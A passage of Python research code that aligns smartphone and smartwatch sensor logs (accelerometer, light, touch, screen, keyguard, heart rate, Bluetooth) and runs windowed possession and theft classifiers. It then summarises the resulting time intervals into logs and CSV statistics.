argparse\nimport time as TIMER\n# import matplotlib.pyplot as plt\n# from matplotlib.dates import SecondLocator, MinuteLocator, HourLocator, DateFormatter, date2num\n# import classifier\nimport Sensors as sensors\nimport Classifiers as classifiers \nimport PossessionState\nimport pickle\nimport argparse\nimport traceback\nimport math\n\nfrom configsettings import *\nfrom collections import deque, Counter, OrderedDict\nfrom UnlockTimeChecker import computeUnlocks\n\nDUMP_RESULTS = True\n\nif DIRECTORY[-1] != '/':\n DIRECTORY += '/'\n\nNOW = datetime.datetime.now()\n# NOW_DAY = NOW.strftime('%Y_%m_%d')\n\nYESTERDAY = (NOW - datetime.timedelta(days=1)).strftime('%Y_%m_%d')\n# NOW_DAY = YESTERDAY\nNOW_DAY = '2016_11_01'\n\n# RELEVANT_SENSORS = set([])\n# RELEVANT_SENSORS = [sensors.ACCELEROMETER, sensors.PHONE_ACTIVE_SENSORS]\nRELEVANT_SENSORS = [sensors.ACCELEROMETER, sensors.PHONE_ACTIVE_SENSORS, sensors.LIGHT_SENSOR]\nHEARTRATE_SENSOR = sensors.HEART_RATE\n# BLUETOOTH_SENSOR = sensors.BLUETOOTH_CONNECTED\n# WATCH_SENSORS = [HEARTRATE_SENSOR, BLUETOOTH_SENSOR]\nWATCH_SENSORS = [HEARTRATE_SENSOR, sensors.CONNECTED_DEVICES]\nYEAR_2000 = datetime.date(2000, 1, 1)\n\nBOOT_TIME_DELTA = datetime.timedelta(hours=1)\nBOOT_TIME_SENSOR = sensors.ACCELEROMETER\nSTART_OF_TIME = datetime.datetime.min\n\nSANITY_TEST = False\nmaxWindowSize = 100\n\n# START_TIME_FILTER = datetime.time(hour=8)\n# END_TIME_FILTER = datetime.time(hour=22)\nRESULTS_DIRECTORY = './' + 'RESULTS/' + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M')\nSTART_TIME_FILTER = None\nEND_TIME_FILTER = None\n\n# SAFE_PERIOD = 3\n\nSAFE_PERIOD = 3\nUSE_CACHED_DATA = False\n\ndef getUserFilesByDayAndInstrument(userID, instrument):\n query = DIRECTORY + 'AppMon_' + userID + '*_' + instrument + '_' + '*'\n userFiles = glob.glob(query)\n userFiles.sort()\n # TODO: Need to filter for sensors that need data files with matching times as other\n # sensors (e.g. 
accelerometer and step count for Theft Classifier)\n # print(userFiles)\n return userFiles\n\n\ndef dataFilesToDataList(userFiles, bootTimes, needsToComputeBootTime=False):\n dataList = []\n currentBootTime = START_OF_TIME\n nextFileTime = START_OF_TIME\n nextFileTimeIndex = 0\n\n # print(\"USER FILES\")\n # print(userFiles)\n \n for dataFile in userFiles:\n with open(dataFile) as f: \n reader = csv.reader(f)\n \n fileTime = timeStringToDateTime(getTimeFromFile(dataFile))\n\n firstRow = next(reader)\n firstTime = datetime.timedelta(milliseconds=int(firstRow[0]))\n\n if needsToComputeBootTime:\n bootTime = fileTime - firstTime\n\n difference = bootTime - currentBootTime if bootTime > currentBootTime else currentBootTime - bootTime\n\n if difference > BOOT_TIME_DELTA:\n currentBootTime = bootTime \n bootTimes.append((fileTime, bootTime))\n \n else:\n # print(\"FileTime\", str(fileTime))\n # print(\"NextFileTime\", str(nextFileTime))\n if fileTime > nextFileTime:\n currentBootTime = bootTimes[nextFileTimeIndex][1] # boot time has changed, update\n # print(\"Current Boot Time:\", currentBootTime)\n nextFileTimeIndex = nextFileTimeIndex + 1 if nextFileTimeIndex < len(bootTimes) - 1 else nextFileTimeIndex\n nextFileTime = bootTimes[nextFileTimeIndex][0]\n\n firstRow[0] = convertToDateTime(firstRow[0], currentBootTime)\n minLength = len(firstRow)\n if len(firstRow) >= 2:\n if (START_TIME_FILTER == None or firstRow[0].time() >= START_TIME_FILTER) and (END_TIME_FILTER == None or firstRow[0].time() < END_TIME_FILTER):\n dataList.append(firstRow)\n count = 1\n for row in reader:\n if len(row) >= 2 and len(row) >= minLength:\n row[0] = convertToDateTime(row[0], currentBootTime)\n if (START_TIME_FILTER == None or row[0].time() >= START_TIME_FILTER):\n if (END_TIME_FILTER == None or row[0].time() < END_TIME_FILTER):\n dataList.append(row)\n else:\n return dataList\n\n if SANITY_TEST:\n count += 1\n if count > 10000:\n break\n # print(\"DATA LIST\")\n # print(len(dataList))\n return dataList\n\ndef dataFilesToDataListAbsTime(userFiles):\n dataList = []\n for dataFile in userFiles:\n with open(dataFile) as f:\n reader = csv.reader(f)\n for row in reader:\n if len(row) > 1:\n timestamp = int(row[1]) / 1000\n row[0] = datetime.datetime.fromtimestamp(timestamp)\n if (START_TIME_FILTER == None or row[0].time() >= START_TIME_FILTER):\n if (END_TIME_FILTER == None or row[0].time() < END_TIME_FILTER):\n dataList.append(row)\n # print \"Number of heartrate files\"\n # print len(dataList)\n return dataList\n\ndef getReferenceBootTimes(userID):\n userFiles = getUserFilesByDayAndInstrument(userID, BOOT_TIME_SENSOR)\n\n bootTimes = []\n currentBootTime = START_OF_TIME\n \n for dataFile in userFiles:\n with open(dataFile) as f: \n reader = csv.reader(f)\n \n fileTime = timeStringToDateTime(getTimeFromFile(dataFile))\n\n firstRow = next(reader)\n firstTime = datetime.timedelta(milliseconds=int(firstRow[0]))\n\n bootTime = fileTime - firstTime\n\n difference = bootTime - currentBootTime if bootTime > currentBootTime else currentBootTime - bootTime\n\n if difference > BOOT_TIME_DELTA:\n currentBootTime = bootTime \n bootTimes.append((fileTime, bootTime))\n\n return bootTimes\n\n\n\ndef getRelevantUserData(userID, logInfo=False, logFile=None):\n userData = {}\n bootTimes = []\n\n dataFiles = getUserFilesByDayAndInstrument(userID, BOOT_TIME_SENSOR)\n userData[BOOT_TIME_SENSOR] = dataFilesToDataList(dataFiles, bootTimes, True)\n\n for instrument in RELEVANT_SENSORS:\n if instrument != BOOT_TIME_SENSOR and 
instrument != sensors.PHONE_ACTIVE_SENSORS:\n \n dataFiles = getUserFilesByDayAndInstrument(userID, instrument)\n userData[instrument] = dataFilesToDataList(dataFiles, bootTimes)\n \n #print(len(userData[sensors.ACCELEROMETER]))\n userData[sensors.PHONE_ACTIVE_SENSORS], userData[sensors.KEYGUARD] = processPhoneActiveData(userID, userData[sensors.ACCELEROMETER])\n print(\"KEYGUARD\", len(userData[sensors.KEYGUARD]))\n\n # print(\"GONNA TRY TO GET LIGHT SENSOR DATA\")\n userData[sensors.LIGHT_SENSOR] = processLightSensorData(userData)\n userData[BOOT_TIME_SENSOR] = userData[BOOT_TIME_SENSOR][:-1]\n print(\"Length accel:\", len(userData[BOOT_TIME_SENSOR]))\n print(\"Length active:\", len(userData[sensors.PHONE_ACTIVE_SENSORS]))\n\n for instrument in WATCH_SENSORS:\n dataFiles = getUserFilesByDayAndInstrument(userID, instrument)\n # print \"Heart Rate Files\"\n # print dataFiles\n userData[instrument] = dataFilesToDataListAbsTime(dataFiles)\n\n if logInfo:\n logFile.write(\"Data Files Analyzed:\\n\")\n for filename in dataFiles:\n logFile.write(getTimeFromFile(filename) + \"_.csv\" + '\\n')\n logFile.write(\"Boot Times Computed:\\n\")\n for bootTime in bootTimes:\n logFile.write(\"Files after \" + str(formatTime(bootTime[0], withDate=True)) + \", have boot time: \" + str(formatTime(bootTime[1], withDate=True)) + '\\n')\n\n return userData\n\ndef processLightSensorData(userData):\n \n dataAccel = userData[sensors.ACCELEROMETER]\n if len(dataAccel) <= 1:\n return []\n dataLight = userData[sensors.LIGHT_SENSOR]\n dataLightProcessed = []\n firstAccelTime = dataAccel[0][0]\n \n firstLightTime = None\n firstLightValue = None\n\n currentLightIndex = -1\n startLightIndex = -1\n accelIndex = 0\n if len(dataLight) <= 1:\n return\n\n currentLightIndex = 0\n currentTime = dataLight[currentLightIndex][0]\n prevLightValue = None\n while currentTime < firstAccelTime: \n currentLightIndex += 1\n if currentLightIndex >= len(dataLight):\n break\n currentTime = dataLight[currentLightIndex][0]\n prevLightValue = dataLight[currentLightIndex][1]\n\n startLightIndex = currentLightIndex\n firstLightTime = dataLight[currentLightIndex][0]\n firstLightValue = dataLight[currentLightIndex][1] if prevLightValue == None else prevLightValue\n\n # print(\"GOT OUT OF FIRST WHILE\")\n currentAccelTime = dataAccel[accelIndex][0]\n while currentAccelTime < firstLightTime:\n lightRow = [currentAccelTime, firstLightValue]\n dataLightProcessed.append(lightRow)\n accelIndex += 1\n currentAccelTime = dataAccel[accelIndex][0]\n\n\n currentLightDate = dataLight[currentLightIndex][0]\n nextLightDate = dataLight[currentLightIndex + 1][0]\n\n # print(\"NOW ADDING DATA\")\n for i in range(accelIndex, len(dataAccel) - 1):\n accelRow = dataAccel[i]\n accelRowNext = dataAccel[i + 1]\n \n accelDate = accelRow[0]\n accelDateNext = accelRowNext[0]\n \n currentLightVal = dataLight[currentLightIndex][1]\n\n if accelDate >= nextLightDate:\n if currentLightIndex + 1 < len(dataLight):\n currentLightIndex += 1\n currentLightDate = dataLight[currentLightIndex][0]\n if currentLightIndex + 1 < len(dataLight):\n nextLightDate = dataLight[currentLightIndex + 1][0]\n \n lightRow = [accelDate, currentLightVal]\n dataLightProcessed.append(lightRow)\n \n else:\n lightRow = [accelDate, currentLightVal]\n dataLightProcessed.append(lightRow)\n\n return dataLightProcessed\n\ndef continuousWatchInterals(userID, userData={}):\n if len(userData) == 0:\n for instrument in WATCH_SENSORS:\n dataFiles = getUserFilesByDayAndInstrument(userID, instrument)\n # print \"Heart 
Rate Files\"\n # print dataFiles\n userData[instrument] = dataFilesToDataListAbsTime(dataFiles)\n watchData = userData\n delta = datetime.timedelta(seconds=60)\n allIntervals = {}\n\n for instrument in WATCH_SENSORS:\n startTime = -1\n prevTime = -1\n intervals = []\n prevState = -1\n watchTimes = watchData[instrument]\n\n for row in watchTimes:\n time = row[0]\n state = row[-1]\n if startTime == -1:\n startTime = time\n elif time - prevTime > delta or prevState != state:\n intervals.append((startTime, prevTime, prevState))\n startTime = time\n prevState = state\n prevTime = time\n\n if prevTime != -1 and startTime != -1 and prevTime != -1:\n intervals.append((startTime, prevTime, prevState))\n allIntervals[instrument] = intervals \n return allIntervals\n\n# returns interval and state (1 = phone is near, 0, phone is not near, -1 unknown state)\ndef stateFromWatchData(allIntervals, file):\n i = 0\n j = 0\n bluetoothIntervals = allIntervals[sensors.CONNECTED_DEVICES]\n heartRateIntervals = allIntervals[HEARTRATE_SENSOR]\n states = [\"phoneNear\", \"phoneFar\", \"unknown\"]\n allIntervals = []\n for h in heartRateIntervals:\n start, end, state = h\n allIntervals.append((start, end, \"phoneNear\"))\n basisPeakIntervals = []\n for b in bluetoothIntervals:\n start, end, state = b\n if str(state) == \"Basis Peak\":\n basisPeakIntervals.append((start, end))\n noHeartIntervals = []\n prevTime = -1\n for start, end, state in heartRateIntervals:\n if prevTime == -1:\n prevTime = end\n elif start > prevTime:\n noHeartIntervals.append((prevTime, start))\n prevTime = end\n\n while i < len(noHeartIntervals) and j < len(basisPeakIntervals):\n hInterval = noHeartIntervals[i]\n bInterval = basisPeakIntervals[j]\n hStart, hEnd = hInterval\n bStart, bEnd = bInterval\n\n if hEnd < bStart:\n allIntervals.append((hStart, hEnd, \"phoneFar\"))\n i += 1\n elif bEnd < hStart:\n j += 1\n elif hStart < bStart:\n allIntervals.append((hStart, bStart, \"phoneFar\"))\n if bEnd < hEnd:\n allIntervals.append((bStart, bEnd, \"unknown\"))\n j += 1\n noHeartIntervals[i] = (bEnd, hEnd)\n else: \n allIntervals.append((bStart, hEnd, \"unknown\"))\n i += 1\n basisPeakIntervals[j] = (hEnd, bEnd)\n else:\n bStart = hStart\n if hEnd < bEnd:\n allIntervals.append((bStart, hEnd, \"unknown\"))\n i += 1\n basisPeakIntervals[j] = (hEnd, bEnd)\n else:\n allIntervals.append((bStart, bEnd, \"unknown\"))\n j += 1 \n noHeartIntervals[i] = (bEnd, hEnd)\n\n while i < len(noHeartIntervals):\n hInterval = noHeartIntervals[i]\n hStart, hEnd = hInterval\n allIntervals.append((hStart, hEnd, \"phoneFar\"))\n i += 1\n\n allIntervals = sorted(allIntervals, key=lambda x: x[0])\n logString = \"\"\n result = {}\n for start, end, state in allIntervals:\n if state not in result:\n result[state] = [(start, end)]\n else:\n result[state].append((start, end))\n logString += state + \" : (\" + str(start) + \", \" + str(end) + \")\"\n logString += \"\\n\"\n file.write(logString)\n return result, allIntervals\n\ndef watchActivationStates(watchStates):\n activated = []\n deactivated = []\n delta = datetime.timedelta(minutes=3)\n for start, end, state in watchStates:\n if state == \"phoneNear\":\n activated.append((start, end))\n else:\n if end - start > delta:\n deactivated.append((start, end))\n else:\n activated.append((start, end))\n # if \"phoneNear\" in watchStates:\n # activated = watchStates[\"phoneNear\"]\n # if \"unknown\" in watchStates:\n # deactivated += watchStates[\"unknown\"]\n # if \"phoneFar\" in watchStates:\n # deactivated += 
watchStates[\"phoneFar\"]\n \n activated = sorted(activated, key=lambda x: x[0])\n deactivated = sorted(deactivated, key=lambda x: x[0])\n # print(\"DEACTIVATED WATCH:\", deactivated)\n mergeAdjacentIntervals(deactivated)\n mergeAdjacentIntervals(activated)\n return activated, deactivated\n\n\n\ndef processPhoneActiveData(ID, posDataAccel):\n if len(posDataAccel) <= 1:\n return []\n\n firstAccelTime = posDataAccel[0][0]\n \n posFilesTouch = getUserFilesByDayAndInstrument(ID, 'TouchScreenAsEvent')\n rawPosDataTouch = dataFilesToDataListAbsTime(posFilesTouch)\n # # print(\"RAW DATA TOUCH\")\n # # print(rawPosDataTouch)\n \n posFilesScreen = getUserFilesByDayAndInstrument(ID, 'TriggeredScreenState')\n rawPosDataScreen = dataFilesToDataListAbsTime(posFilesScreen)\n \n posFilesLocked = getUserFilesByDayAndInstrument(ID, 'TriggeredKeyguard')\n rawPosDataLocked = dataFilesToDataListAbsTime(posFilesLocked)\n\n\n\n currScreenDate = None\n nextScreenDate = None\n currScreenVal = None\n currLockedDate = None\n nextLockedDate = None\n currLockedVal = None\n \n touchIndex = -1\n if len(rawPosDataTouch) > 0:\n\n touchIndex = 0\n currentTime = rawPosDataTouch[touchIndex][0]\n while currentTime < firstAccelTime: \n touchIndex += 1\n if touchIndex >= len(rawPosDataTouch):\n break\n currentTime = rawPosDataTouch[touchIndex][0]\n\n startTouchIndex = touchIndex\n \n screenIndex = -1\n if len(rawPosDataScreen) > 0:\n screenIndex = 0\n currentTime = rawPosDataScreen[screenIndex][0]\n while currentTime < firstAccelTime:\n screenIndex += 1\n if screenIndex >= len(rawPosDataScreen):\n break\n currentTime = rawPosDataScreen[screenIndex][0]\n # # print(currentTime)\n # # print(screenIndex)\n currScreenDate = rawPosDataScreen[screenIndex][0]\n currScreenVal = rawPosDataScreen[screenIndex][2]\n if len(rawPosDataScreen) > 1:\n nextScreenDate = rawPosDataScreen[screenIndex + 1][0]\n \n lockedIndex = -1\n if len(rawPosDataLocked) > 0:\n lockedIndex = 0\n currentTime = rawPosDataLocked[lockedIndex][0]\n while currentTime < firstAccelTime:\n lockedIndex += 1\n if lockedIndex >= len(rawPosDataLocked):\n break\n currentTime = rawPosDataLocked[lockedIndex][0]\n currLockedDate = rawPosDataLocked[lockedIndex][0]\n currLockedVal = rawPosDataLocked[lockedIndex][2]\n if len(rawPosDataLocked) > 1:\n nextLockedDate = rawPosDataLocked[lockedIndex + 1][0]\n \n posDataTouch = []\n posDataScreen = []\n posDataLocked = []\n \n # # print(firstAccelTime)\n # # print(screenIndex)\n \n truthToNum = lambda x : 0 if str(x) == 'false' else 1\n \n for i in range(len(posDataAccel) - 1):\n accelRow = posDataAccel[i]\n accelRowNext = posDataAccel[i + 1]\n \n accelDate = accelRow[0]\n accelDateNext = accelRowNext[0]\n \n # Calculate number of touch events starting at this row time and before next row time\n # touchDate >= firstAccelTime\n if len(rawPosDataTouch) == 0 or touchIndex >= len(rawPosDataTouch) or rawPosDataTouch[touchIndex][0] >= accelDateNext: # No touch events\n touchRow = [accelDate, 0]\n posDataTouch.append(touchRow)\n ## print(\"TOUCH DATE:\" + str(touchDate))\n ## print(\"ACCEL DATE:\" + str(accelDate))\n \n else: #touchDate < AccelDateNext\n numTouches = 0\n touchDate = rawPosDataTouch[touchIndex][0]\n while touchDate < accelDateNext and touchIndex < len(rawPosDataTouch):\n # # print(\"TOUCH RECOGNIZED!\")\n numTouches += 1\n touchIndex += 1\n if touchIndex < len(rawPosDataTouch) - 1:\n touchDate = rawPosDataTouch[touchIndex][0]\n \n touchRow = [accelDate, numTouches]\n posDataTouch.append(touchRow)\n \n \n # Calculate if screen on 
in this interval\n if currScreenDate == None or nextScreenDate == None:\n screenRow = [accelDate, 0]\n posDataScreen.append(screenRow)\n\n elif accelDate >= nextScreenDate:\n if screenIndex + 1 < len(rawPosDataScreen):\n screenIndex += 1\n currScreenDate = rawPosDataScreen[screenIndex][0]\n currScreenVal = rawPosDataScreen[screenIndex][2]\n if screenIndex + 1 < len(rawPosDataScreen):\n nextScreenDate = rawPosDataScreen[screenIndex + 1][0]\n \n screenRow = [accelDate, truthToNum(currScreenVal)]\n posDataScreen.append(screenRow)\n \n else:\n screenRow = [accelDate, truthToNum(currScreenVal)]\n posDataScreen.append(screenRow)\n \n # Calculate if locked on in this interval\n\n if currLockedDate == None or nextLockedDate == None:\n screenRow = [accelDate, 0]\n posDataLocked.append(screenRow)\n elif accelDate >= nextLockedDate:\n if lockedIndex + 1 < len(rawPosDataLocked):\n lockedIndex += 1\n currLockedDate = rawPosDataLocked[lockedIndex][0]\n currLockedVal = rawPosDataLocked[lockedIndex][2]\n if lockedIndex + 1 < len(rawPosDataLocked):\n nextLockedDate = rawPosDataLocked[lockedIndex + 1][0]\n \n lockedRow = [accelDate, truthToNum(currLockedVal)]\n posDataLocked.append(lockedRow)\n \n else:\n lockedRow = [accelDate, truthToNum(currLockedVal)]\n posDataLocked.append(lockedRow)\n \n posData = []\n curAccelSignX = float(posDataAccel[0][1]) > 0\n curAccelSignY = float(posDataAccel[0][2]) > 0\n curAccelSignZ = float(posDataAccel[0][3]) > 0\n \n curSigns = [curAccelSignX, curAccelSignY, curAccelSignZ]\n \n signsChanged = lambda now, cur : [1 if now[i] != cur[i] else 0 for i in range(len(now))]\n for i in range(len(posDataAccel) - 1):\n try:\n accelSignX = float(posDataAccel[i][1]) > 0\n accelSignY = float(posDataAccel[i][2]) > 0\n accelSignZ = float(posDataAccel[i][3]) > 0\n \n newSigns = [accelSignX, accelSignY, accelSignZ]\n accelSigns = signsChanged(newSigns, curSigns)\n curSigns = newSigns\n \n \n numTouches = posDataTouch[i][1]\n screenState = posDataScreen[i][1]\n lockedState = posDataLocked[i][1]\n \n row = [posDataAccel[i][0]] + [numTouches, screenState, lockedState] + accelSigns\n posData.append(row)\n\n except (ValueError,IndexError):\n print(\"BAD VALUE OF I:\", i)\n numTouches = posDataTouch[i][1]\n screenState = posDataScreen[i][1]\n lockedState = posDataLocked[i][1]\n \n row = [posDataAccel[i][0]] + [numTouches, screenState, lockedState] + signsChanged(curSigns, curSigns)\n posData.append(row)\n \n return posData, rawPosDataLocked\n\n\n\n\ndef runClassifier(classifier, userData):\n windowSize = classifier.getWindowTime()\n instruments = classifier.getRelevantSensors()\n \n # numRows = min([len(userData[instrument]) for instrument in instruments])\n # # print(len(userData[sensors.ACCELEROMETER]))\n\n classifications = []\n\n for i in range(maxWindowSize // windowSize):\n windowOfData = {}\n for instrument in instruments:\n start = i * windowSize\n end = (i + 1) * windowSize\n windowOfData[instrument] = userData[instrument][start:end]\n classification = classifier.classify(windowOfData)\n classifications.append(classification)\n \n return classifications\n\n# {windowStartTime : 0, 1}\n# {7:30pm : 0}\n\n# {0 : [list of times], 1 : [list of times]}\n\ndef getHeartRateTimes(userData):\n heartRateData = userData[HEARTRATE_SENSOR]\n intervals = []\n # # print \"Heart rate data\"\n # # print len(heartRateData)\n if len(heartRateData) <= 0:\n return intervals\n\n currentWindowStartTime = heartRateData[0][0]\n currentWindowEndTime = currentWindowStartTime\n THRESHOLD = 
datetime.timedelta(minutes=5)\n for row in heartRateData:\n time = row[0]\n if time - currentWindowEndTime > THRESHOLD:\n interval = (currentWindowStartTime, currentWindowEndTime)\n intervals.append(interval)\n currentWindowStartTime = time\n currentWindowEndTime = time\n else:\n currentWindowEndTime = time\n interval = (currentWindowStartTime, currentWindowEndTime)\n intervals.append(interval)\n\n return intervals\n\n\n\ndef runClassifiersOnUser(userID, csvWriter, resultsFile, userData={}):\n if DUMP_RESULTS:\n resultsFile.write(\"###########################\\n\")\n resultsFile.write(str(userID) + '\\n')\n resultsFile.write(\"###########################\\n\")\n # print(userID)\n if len(userData) == 0:\n userData = getRelevantUserData(userID, logInfo=True, logFile=resultsFile)\n heartRateTimes = getHeartRateTimes(userData)\n\n csvRow = [userID]\n results = {}\n pickleResults = {}\n\n for instrument in RELEVANT_SENSORS:\n print(instrument, \":\", len(userData[instrument])) \n\n numRows = min([len(userData[instrument]) for instrument in RELEVANT_SENSORS])\n\n classifications = []\n intervalsByClass = {}\n SMOOTHING_NUM = 10\n resultsBuffer = deque()\n resultsCounter = Counter()\n currentClass = -1\n firstTime = userData[sensors.ACCELEROMETER][0][0]\n currentInterval = (firstTime, firstTime)\n\n for c in classifiers.CLASSIFIERS:\n # print(c)\n intervalsByClass[c] = []\n intervalsByClass[\"Unknown\"] = []\n\n limit = numRows // maxWindowSize * maxWindowSize\n # print(\"LIMIT\", limit)\n\n print(\"########\")\n print(\"SAFE PERIOD:\", SAFE_PERIOD)\n possessionState = PossessionState.PossessionState(userData, userData[sensors.PHONE_ACTIVE_SENSORS], userData[sensors.KEYGUARD], SMOOTHING_NUM, safe_period=SAFE_PERIOD)\n aggregateClassifierResults = []\n for i in range(0, limit, maxWindowSize):\n windowOfData = {}\n windowStartTime = 0\n for instrument in RELEVANT_SENSORS:\n data = userData[instrument][i:i + maxWindowSize] \n windowOfData[instrument] = data\n windowStartTime = getWindowStartTime(data)\n \n if i % 50000 == 0:\n print(\"i:\", i)\n print(\"NumRows:\", numRows)\n classifierResults = {}\n for c in classifiers.CLASSIFIERS:\n # aggregateClassifierResults[c].append(((windowStartTime, windowStartTime + datetime.timedelta(seconds=1)), results))\n classifier = classifiers.CLASSIFIERS[c]\n results = runClassifier(classifier, windowOfData)\n classifierResults[classifier] = results\n # if i % 50000 == 0 and c ==classifiers.HAND_CLASSIFIER:\n # print(\"TYPE: \", type(results))\n\n\n logString = windowStartTime.strftime(\"%H:%M:%S\") + \"| \" \n aggregateWindow = {}\n for c in classifierResults:\n aggregateWindow[c.getName()] = classifierResults[c]\n aggregateClassifierResults.append(((windowStartTime, windowStartTime + datetime.timedelta(seconds = 1)), aggregateWindow))\n windowClassification = classifierPolicy(classifierResults)\n logString += \"___\" + windowClassification[0] + \"___ \" \n for c, results in classifierResults.items():\n r = Counter()\n for result in results:\n r[result] += 1\n r = dict(r)\n logString += '\"' + c.getName()[0] + '\"' + \":\" + str(r) + \"; \"\n logString += \"\\n\"\n resultsFile.write(logString)\n\n resultsBuffer.append((windowStartTime, windowClassification))\n resultsCounter[windowClassification] += 1\n # print(\"WINDOW START TIME:\", windowStartTime)\n if len(resultsBuffer) >= SMOOTHING_NUM:\n middleWindow = resultsBuffer[SMOOTHING_NUM // 2]\n middleWindowStartTime = middleWindow[0]\n # print(\"MIDDLE WINDOW START TIME:\", middleWindowStartTime)\n 
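# --- Editor's note (illustrative sketch, not part of the original source) ---
# The deque/Counter bookkeeping here implements a sliding majority vote: each
# emitted classification is the most common label among SMOOTHING_NUM
# neighbouring windows, which suppresses one-off misclassifications. The same
# idea in isolation:
from collections import Counter, deque

def smooth_labels(labels, k):
    buf, counts, smoothed = deque(), Counter(), []
    for label in labels:
        buf.append(label)
        counts[label] += 1
        if len(buf) >= k:
            smoothed.append(counts.most_common(1)[0][0])
            counts[buf.popleft()] -= 1
    return smoothed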
newClassification = resultsCounter.most_common(1)[0][0]\n \n possessionState.updateState(middleWindowStartTime, newClassification)\n if currentClass == -1:\n currentClass = newClassification\n # currentInterval = (middleWindowStartTime, middleWindowStartTime)\n elif currentClass != newClassification:\n classifications.append((currentInterval, currentClass))\n intervalsByClass[currentClass].append(currentInterval)\n interval = currentInterval\n currentInterval = (middleWindowStartTime, middleWindowStartTime)\n currentClass = newClassification\n else:\n currentInterval = (currentInterval[0], middleWindowStartTime)\n\n removed = resultsBuffer.popleft()\n removedClassification = removed[1]\n resultsCounter[removedClassification] -= 1\n\n\n classifications.append((currentInterval, currentClass))\n intervalsByClass[currentClass].append(currentInterval)\n\n return classifications, intervalsByClass, possessionState, aggregateClassifierResults\n\n\ndef logResultsToFile(classifierResults, classifier_name, resultsFile):\n resultsFile.write(\"-------------------------------------\\n\")\n resultsFile.write(str(classifier_name) + '\\n')\n resultsFile.write(\"-------------------------------------\\n\")\n resultIntervals, resultIntervalsByValue = classifierResults\n resultsFile.write(\"Result Intervals\\n\")\n for interval in resultIntervals:\n interval = (formatTimeInterval(interval[0], withDate=True), interval[1])\n resultsFile.write(str(interval) + '\\n')\n\n posTimes = resultIntervalsByValue[1]\n negTimes = resultIntervalsByValue[0]\n\n resultsFile.write(\"Positive Intervals\\n\")\n for interval in posTimes:\n resultsFile.write(formatTimeInterval(interval, withDate=True) + ' ; ' + formatTimeValue(intervalLength(interval)) + '\\n')\n\n resultsFile.write(\"Negative Intervals\\n\")\n for interval in negTimes:\n resultsFile.write(formatTimeInterval(interval, withDate=True) + ' ; ' + formatTimeValue(intervalLength(interval)) + '\\n')\n\n\n\ndef processTheftResults(results, writer, csvRow):\n resultIntervals, resultIntervalsByValue = results[0], results[1]\n\n posTimes = resultIntervalsByValue[1]\n negTimes = resultIntervalsByValue[0]\n numPos = len(posTimes)\n numNeg = len(negTimes)\n numTotal = numPos + numNeg\n\n posTimesString = \"No false positive periods\"\n longestPosIntervalString = \"No false positive periods\"\n\n if len(posTimes) > 0:\n posTimesString = intervalsToString(posTimes)\n longestPosInterval = posTimes[0]\n longestPosIntervalLength = intervalLength(posTimes[0])\n for interval in posTimes:\n length = intervalLength(interval)\n if length > longestPosIntervalLength:\n longestPosIntervalLength = length\n longestPosInterval = interval\n\n longestPosIntervalString = formatTimeInterval(longestPosInterval)\n\n csvRow += [longestPosIntervalString, posTimesString, str(numPos), str(numNeg), str(numTotal)] \n\ndef processResults(results, writer, csvRow):\n # analyze results\n # write actionable output to writer\n resultIntervals, resultIntervalsByValue = results[0], results[1]\n \n negativeIntervals = sorted(resultIntervalsByValue[0], key=intervalLength) \n positiveIntervals = sorted(resultIntervalsByValue[1], key=intervalLength)\n\n negStats = getIntervalStats(negativeIntervals)\n posStats = getIntervalStats(positiveIntervals)\n\n negTime = negStats[\"totalTimeSpent\"].total_seconds()\n posTime = posStats[\"totalTimeSpent\"].total_seconds()\n totalTime = negTime + posTime\n\n negTimePercentage = negTime / totalTime if totalTime > 0 else 0\n posTimePercentage = posTime / totalTime if totalTime > 0 
else 0\n\n stats = [\"totalTimeSpent\", \"medianLength\", \"avgLength\", \"longestInterval\", \"shortestInterval\"]\n\n csvRow.append(posTimePercentage)\n for stat in stats:\n val = posStats[stat]\n csvRow.append(formatTimeValue(val))\n \n csvRow.append(negTimePercentage)\n for stat in stats:\n val = negStats[stat]\n csvRow.append(formatTimeValue(val))\n \n\ndef getIntervalStats(intervals):\n stats = {}\n intervalLengths = [intervalLength(interval) for interval in intervals]\n # print(intervalLengths)\n totalTimeSpent = datetime.timedelta(seconds=0)\n for interval in intervalLengths:\n if type(interval) is int:\n continue\n totalTimeSpent += interval\n\n medianLength = \"N/A\"\n avgLength = \"N/A\"\n longestInterval = \"N/A\"\n shortestInterval = \"N/A\"\n\n if totalTimeSpent.total_seconds() < 0:\n print(\"Negative total time; dumping intervals:\")\n for interval in intervals:\n print(formatTimeInterval(interval))\n\n if len(intervals) > 0:\n medianLength = intervalLength(intervals[len(intervals) // 2])\n avgLength = totalTimeSpent / len(intervalLengths)\n longestInterval = intervals[-1]\n shortestInterval = intervals[0]\n\n\n stats[\"totalTimeSpent\"] = totalTimeSpent\n stats[\"medianLength\"] = medianLength\n stats[\"avgLength\"] = avgLength\n stats[\"longestInterval\"] = longestInterval\n stats[\"shortestInterval\"] = shortestInterval\n \n\n return stats\n\ndef getIntervalStatHeaders(classifier_name):\n headers = [\"% Time Positive\", \"Total Time Positive\", \"Median Period Length\", \"Average Period Length\",\n \"Longest Positive Period\", \"Shortest Positive Period\", \"% Time Negative\", \"Total Time Negative\", \"Median Period Length\", \"Average Period Length\",\n \"Longest Negative Period\", \"Shortest Negative Period\",]\n\n classifier = \" (\" + classifier_name + \")\"\n return [header + classifier for header in headers]\n\n\n\ndef processAllClassifierResults(results, csvRow):\n conflictingClassifications = findConflictingClassifications(results, False)\n # print \"These classifications conflict\"\n # print conflictingClassifications\n if len(conflictingClassifications) > 0:\n csvRow += [intervalsToString(conflictingClassifications)]\n else:\n csvRow += [\"No times when multiple classifiers output 1\"]\n\n conflictingClassificationsIncludingTheft = findConflictingClassifications(results, True)\n if len(conflictingClassificationsIncludingTheft) > 0:\n csvRow += [intervalsToString(conflictingClassificationsIncludingTheft)]\n else:\n csvRow += [\"No times when multiple classifiers output 1\"]\n\n\ndef findConflictingClassifications(results, includeTheft):\n conflictingVal = 1\n conflictingClassifications = []\n for classifier in results:\n if includeTheft or classifier != classifiers.THEFT_CLASSIFIER:\n intervals = results[classifier][1][conflictingVal]\n conflictingClassifications = findCommonIntervals(conflictingClassifications, intervals)\n\n return conflictingClassifications\n\ndef mergeAdjacentIntervalsByValue(intervals):\n i = 0\n while i + 1 < len(intervals):\n curr = intervals[i]\n next = intervals[i + 1]\n if curr[1] == next[1]:\n intervals[i] = ((curr[0][0], next[0][1]), curr[1])\n del intervals[i + 1]\n else:\n i += 1 \n\ndef mergeAdjacentIntervals(intervals):\n i = 0\n while i + 1 < len(intervals):\n curr = intervals[i]\n next = intervals[i + 1]\n if 